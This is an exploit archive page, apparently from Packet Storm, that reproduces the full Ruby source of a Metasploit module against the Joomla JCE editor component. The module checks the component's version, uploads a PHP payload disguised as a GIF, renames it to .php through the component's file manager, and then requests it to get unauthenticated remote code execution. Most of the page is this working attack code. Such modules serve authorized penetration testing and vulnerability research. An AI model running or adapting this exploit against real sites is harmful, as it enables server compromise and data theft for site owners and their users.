Twenty Year Anniversary

Joomla Component JCE File Upload Remote Code Execution

Joomla Component JCE File Upload Remote Code Execution
Posted Mar 27, 2013
Authored by temp66 | Site metasploit.com

This Metasploit module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This Metasploit module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.

tags | exploit, remote, web, arbitrary, php
MD5 | 351613b5116036e2b99d0dac802e3947

Joomla Component JCE File Upload Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => 'Aug 2 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
], self.class)
end


def get_version
# check imgmanager version
@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
@vars_get_base = {
'option'=> 'com_jce',
'task' => 'plugin',
'plugin'=> 'imgmanager',
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})

version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
end

return version
end

def check
version = ( get_version || '').to_s

if (version.match(%r{1\.5\.7\.1[0-4]?}))
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def upload_gif
# add GIF header
cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

# Generate some random strings
@payload_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)

parms = {'method'=> 'form'}
parms.merge!(@vars_get_base)

# POST data
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

data = post_data.to_s

res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => parms,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
print_good("Successfully uploaded #{@payload_name}.gif")
else
print_error("Error uploading #{@payload_name}.gif")
return :abort
end

return :success

end

def renamed?
# Rename the file from .gif to .php

data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

res = send_request_cgi(
{
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
'headers' =>
{
'X-Request' => 'JSON'
}
})
if (res and res.code == 200 )
print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
return true
else
print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
return false
end
end

def call_payload
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end



def exploit

return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end

end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    3 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    18 Files
  • 6
    Sep 6th
    18 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    2 Files
  • 9
    Sep 9th
    2 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    17 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    29 Files
  • 14
    Sep 14th
    21 Files
  • 15
    Sep 15th
    3 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    16 Files
  • 19
    Sep 19th
    29 Files
  • 20
    Sep 20th
    18 Files
  • 21
    Sep 21st
    5 Files
  • 22
    Sep 22nd
    2 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close